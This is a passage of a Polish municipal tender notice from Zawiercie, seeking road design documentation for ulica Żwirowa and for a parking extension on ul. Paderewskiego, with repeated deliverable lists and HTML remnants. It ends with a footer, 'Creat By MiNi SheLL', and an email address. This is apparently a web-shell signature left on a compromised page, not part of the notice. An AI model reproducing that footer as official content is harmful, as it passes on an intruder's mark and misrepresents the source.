1)	wykonanie badań geotechnicznych gruntu w dobudowywanym odcinku jezdni, które należy przedłożyć w formie opinii geotechnicznej wraz z dokumentacją badań podłoża gruntowego w 3 egzemplarzach w formie papierowej,
2)	sprawdzenie w terenie warunków wykonania zamówienia (przed przystąpieniem do wykonania prac projektowych),
3)	opracowanie projektu wstępnego (koncepcji) celem uzyskania akceptacji Zamawiającego dla proponowanych rozwiązań w terminie 1 miesiąca od podpisania umowy. Akceptacja nastąpi w formie pisemnej w ciągu 10 dni od daty złożenia.
4)	uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora pozwolenia na budowę, 
5)	opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć ( wskazanie parametrów technicznych).
6)	konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy  a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych w rozdz. III a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia,
7)	wypełnienie  wniosku o pozwolenie na budowę - 2 egz. W wersji papierowej (bez wpisywania daty),
8)	w projektach na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarach, kosztorysach inwestorskich i specyfikacjach technicznych datę zapisywać jako dzień, miesiąc, rok,
9)	przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów,
10)	w przedmiarach i kosztorysach inwestorskich należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót,
11)	przedmiary robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania .
12)	W projektach na stronie tytułowej należy podać klasę drogi i kategorię ruchu. Przed opisem technicznym w projektach załączyć na odrębnej kartce podstawowe dane techniczne projektowanego obiektu takie jak długość, szerokość, powierzchnia dobudowywanych odcinków ulicy oraz materiał nawierzchni, powierzchnia chodników + materiał nawierzchni,                                                            
13)	W projekcie ponadto powinna być zamieszczona w formie tabeli zestawienie działekobjętych inwestycją uwzględniające numer działki, obręb oraz nazwisko i imię właściciela lub władającego,  14)	Przedmiot umowy należy dostarczyć w wersji tradycyjnej (papierowej)  oraz na nośniku elektronicznym w formacie plików pdf (o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Wszystkie rysunki które znajdują się w projektach lub pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej. Każdy tom dokumentacji projektowej powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. 
Mapa zasadnicza stanowi załączniki do specyfikacji istotnych warunków zamówienia.
Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla:Przebudowa ulicy Żwirowej wraz z odwodnieniem w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu  zamówienia:
Przedmiotem zamówienia jest: wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego przebudowy odcinka jezdni o długości ok. 280 mb wraz z odwodnieniem nawierzchni, jednostronnym chodnikiem i wjazdami do posesji. 

Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. nr 202, poz. 2072 z późn. zm.). 
2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych programie funkcjonalno - użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389).

1.	Dokumentacja powinna zawierać:
1)	projekt budowlany branży drogowej wraz z odwodnieniem w 6 egzemplarzach w  wersji papierowej, 1egz.w wersji elektronicznej,
2)	projekt wykonawczy w 3 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
3)	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie  przewidywanych do wykonania robót w kolejności technologicznej ich wykonania,  wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar robót  podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w  rozporządzenia w 4 egzemplarzach  w wersji papierowej, 1 egz. w wersji elektronicznej,
4)	kosztorys inwestorski w 2 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
5)	specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia  w  3 egzemplarzach   w wersji papierowej, 1 egz. w wersji elektronicznej,
6)	projekt czasowej organizacji ruchu w 6 egzemplarzach   w wersji papierowej. 1 egz. w wersji elektronicznej
7)	projekt stałej organizacji ruchu w 6 egzemplarzach w wersji papierowej. 1 egz. w wersji elektronicznej,
8)	mapa do celów projektowych w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
9)	projekt badania podłożą gruntowego wraz z opinią hydrogeologiczną w 3 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej.
2.	W przypadku wystąpienia kolizji z istniejącymi sieciami podziemnymi i nadziemnym do obowiązków Wykonawcy należy opracowanie projektu zabezpieczenia sieci lub usunięcia kolizji. Szczegółowe rozwiązania winny być zgodne z warunkami technicznymi gestorów sieci, po akceptacji Zamawiającego. Uzyskanie warunków technicznych należy do obowiązków wykonawcy projektu. Dokumentację wykonać w ilościach jak określono powyżej.                                                         
3.	Stan istniejący:
Ulica Żwirowa  posiada jezdnię o nawierzchni gruntowej o długości ok. 300,00 mb i utwardzoną powierzchniowo kruszywem.

4.	Dokumentacja winna uwzględniać
- budowę jednostronnego  chodnika  o szerokości średnio 1,6m  usytuowanych w miarę możliwości przy granicy pasa drogowego (przy ogrodzeniach) z kostki brukowej koloru szarego z elementami urozmaicania z kostki czerwonej o powierzchni od 15%  do 25% ogólnej powierzchni chodników, 
- budowę   wjazdów do posesji  z kostki brukowej koloru czarnego,
- budowę zatoki do zawracania zgodnie z planem zagospodarowania przestrzennego,
- rozwiązania problemu odwodnienia wg. propozycji Projektanta zaakceptowanej przez Zamawiającego (w rejonie ulicy Żniwnej brak istniejących kolektorów deszczowych, istnieją natomiast rowy przy drodze do Strefy Aktywności Gospodarczej oraz drugi rów w rejonie działki nr 1325/1 ze spływem w kierunku ulicy Ogrodowej),
- operat wodno-prawny,
- w projekcie wykonać linię rozgraniczającą pas drogowy,
- projekt badania podłoża gruntowego uwzględniającą opinię hydrogeologiczną, która określi m.in. możliwość odprowadzenia wód deszczowych i roztopowych do gruntu.
- komplet niezbędnych uzgodnień każdego projektu z właścicielami mediów: TAURON, RPWiK Zawiercie, Orange, PGNiG - Oddział w Zawierciu i GAZ - SYSTEM Świerklany, ZUD, które umożliwią zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na budowę .

5.	Projekt czasowej organizacji ruchu - winien uzyskać pozytywną opinię Powiatowego Zarządu Dróg w Zawierciu. 

6.	Projekt stałej organizacji ruchu - winien uzyskać pozytywną opinię Komendy Miejskiej Policji  i Powiatowego Zarządu Dróg w Zawierciu ( nie zatwierdzać projektu w PZD ).
 
7.	Ponadto do obowiązków Wykonawcy należy: 
1)	wykonanie badań geotechnicznych gruntu w dobudowywanym odcinku jezdni, które należy przedłożyć w formie opinii geotechnicznej wraz z dokumentacją badań podłoża gruntowego w 3 egzemplarzach w formie papierowej,
2)	sprawdzenie w terenie warunków wykonania zamówienia (przed przystąpieniem do wykonania prac projektowych),
3)	opracowanie projektu wstępnego (koncepcji) celem uzyskania akceptacji Zamawiającego dla proponowanych rozwiązań w terminie 1 miesiąca od podpisania umowy. Akceptacja nastąpi w formie pisemnej w ciągu 10 dni od daty złożenia.
4)	uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora pozwolenia na budowę, 
5)	opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć (wskazanie parametrów technicznych).
6)	konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy  a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych w rozdz. III a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia,
7)	wypełnienie  wniosku o pozwolenie na budowę - 2 egz. W wersji papierowej( bez wpisywania daty),
8)	w projektach na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarach, kosztorysach inwestorskich i specyfikacjach technicznych datę zapisywać jako dzień, miesiąc, rok,
9)	przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów,
10)	w przedmiarach i kosztorysach inwestorskich należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót,
11)	przedmiary robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania .
12)	W projektach na stronie tytułowej należy podać klasę drogi i kategorię ruchu. Przed opisem technicznym w projektach załączyć na odrębnej kartce podstawowe dane techniczne projektowanego obiektu takie jak długość, szerokość, powierzchnia dobudowywanych odcinków ulicy oraz materiał nawierzchni,
- powierzchnia chodników + materiał nawierzchni,                                                           
13)	W projekcie ponadto powinna być zamieszczona w formie tabeli zestawienie działek
objętych inwestycją uwzględniające numer działki, obręb oraz nazwisko i imię właściciela lub władającego,                                                                                      
14)	Przedmiot umowy należy dostarczyć w wersji tradycyjnej (papierowej)  oraz na nośniku elektronicznym w formacie plików pdf (o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Wszystkie rysunki które znajdują się w projektach lub pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej. Każdy tom dokumentacji projektowej powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. 

Mapa zasadnicza stanowi załącznik do specyfikacji istotnych warunków zamówienia.
Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego dla:Rozbudowa parkingu przy drodze wewnętrznej bocznej od ul. Paderewskiego przed budynkiem nr 45 przy ul. Paderewskiego, w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu  zamówienia:
Przedmiotem zamówienia jest  doprojektowanie do istniejącego parkingu maksymalnej ilości miejsc postojowych o wymiarach 2,4 x 5,0m o nawierzchni z kostki brukowej z uwzględnieniem Rozporządzenia Ministra Infrastruktury w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie.

Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. nr 202, poz. 2072 z późn. zm.). 
2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych programie funkcjonalno - użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389).

1.	Dokumentacja powinna zawierać:
1)	projekt budowlany branży drogowej wraz z odwodnieniem w 6 egzemplarzach w  wersji papierowej, 1egz.w wersji elektronicznej,
2)	projekt wykonawczy w 3 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
3)	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie  przewidywanych do wykonania robót w kolejności technologicznej ich wykonania,  wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar robót  podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w  rozporządzenia w 4 egzemplarzach  w wersji papierowej, 1 egz. w wersji elektronicznej,
4)	kosztorys inwestorski w 2 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
5)	specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia  w  3 egzemplarzach   w wersji papierowej, 1 egz. w wersji elektronicznej,
6)	projekt czasowej organizacji ruchu w 6 egzemplarzach   w wersji papierowej. 1 egz. w wersji elektronicznej
7)	projekt stałej organizacji ruchu w 6 egzemplarzach w wersji papierowej. 1 egz. w wersji elektronicznej,
8)	mapa do celów projektowych w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,

2.	W przypadku wystąpienia kolizji z istniejącymi sieciami podziemnymi i nadziemnym do obowiązków Wykonawcy należy opracowanie projektu zabezpieczenia sieci lub usunięcia kolizji. Szczegółowe rozwiązania winny być zgodne z warunkami technicznymi gestorów sieci, po akceptacji Zamawiającego. Uzyskanie warunków technicznych należy do obowiązków wykonawcy projektu. Dokumentację wykonać w ilościach jak określono powyżej.                                                         

3.	Stan istniejący:
Działka nr 29/148 k.m. 40 jest własnością Gminy Zawiercie. Na działce tej usytuowany jest budynek mieszkalny wielorodzinny z infrastrukturą podziemną oraz chodnikami o nawierzchni z kostki brukowej, istniejącym parkingiem o nawierzchni z kostki brukowej na 10 miejsc parkingowych oraz drogą wewnętrzną o nawierzchni asfaltobetonowej.

4.	Dokumentacja winna uwzględniać
- rozbudowę istniejącego parkingu dla samochodów o możliwie maksymalną ilość miejsc postojowych o wymiarach 2,4 m x 5,0 m o nawierzchni z kostki brukowej. Należy zachować istniejące chodniki;
- przebudowę w inne miejsce istniejącego trzepaka wraz z demontażem i ponownym montażem utwardzonej nawierzchni w rejonie trzepaka;
- projekt inwentaryzacji ewentualnych drzew do wycinki wraz z zestawieniem gatunku ilości i obwodu drzewa na wysokości 1,3m;
- komplet niezbędnych uzgodnień każdego projektu z właścicielami mediów:
TAURON, RPWiK Zawiercie, Orange, PGNiG - Oddział w Zawierciu i GAZ - SYSTEM Świerklany, ZUD, które umożliwią zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na budowę .

5.	Projekt czasowej organizacji ruchu - winien uzyskać pozytywną opinię Powiatowego Zarządu Dróg w Zawierciu. 

6.	Projekt stałej organizacji ruchu - winien uzyskać pozytywną opinię Komendy Miejskiej Policji  i Powiatowego Zarządu Dróg w Zawierciu ( nie zatwierdzać projektu w PZD ).
 
7.	Ponadto do obowiązków Wykonawcy należy: 
1)	sprawdzenie w terenie warunków wykonania zamówienia (przed przystąpieniem do wykonania prac projektowych),
2)	opracowanie projektu wstępnego (koncepcji) celem uzyskania akceptacji Zamawiającego dla proponowanych rozwiązań w terminie 1 miesiąca od podpisania umowy. Akceptacja nastąpi w formie pisemnej w ciągu 10 dni od daty złożenia.
3)	uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora pozwolenia na budowę, 
4)	opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć ( wskazanie parametrów technicznych).
5)	konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy  a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych w rozdz. III a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia,
6)	wypełnienie  wniosku o pozwolenie na budowę - 2 egz. W wersji papierowej( bez wpisywania daty),
7)	w projektach na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarach, kosztorysach inwestorskich i specyfikacjach technicznych datę zapisywać jako dzień, miesiąc, rok,
8)	przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów,
9)	w przedmiarach i kosztorysach inwestorskich należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót,
10)	przedmiary robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania .
11)	Przedmiot umowy należy dostarczyć w wersji tradycyjnej (papierowej)  oraz na nośniku elektronicznym w formacie plików pdf (o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Wszystkie rysunki które znajdują się w projektach lub pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej. Każdy tom dokumentacji projektowej powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. 

Mapa zasadnicza stanowi załącznik do specyfikacji istotnych warunków zamówienia.
Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com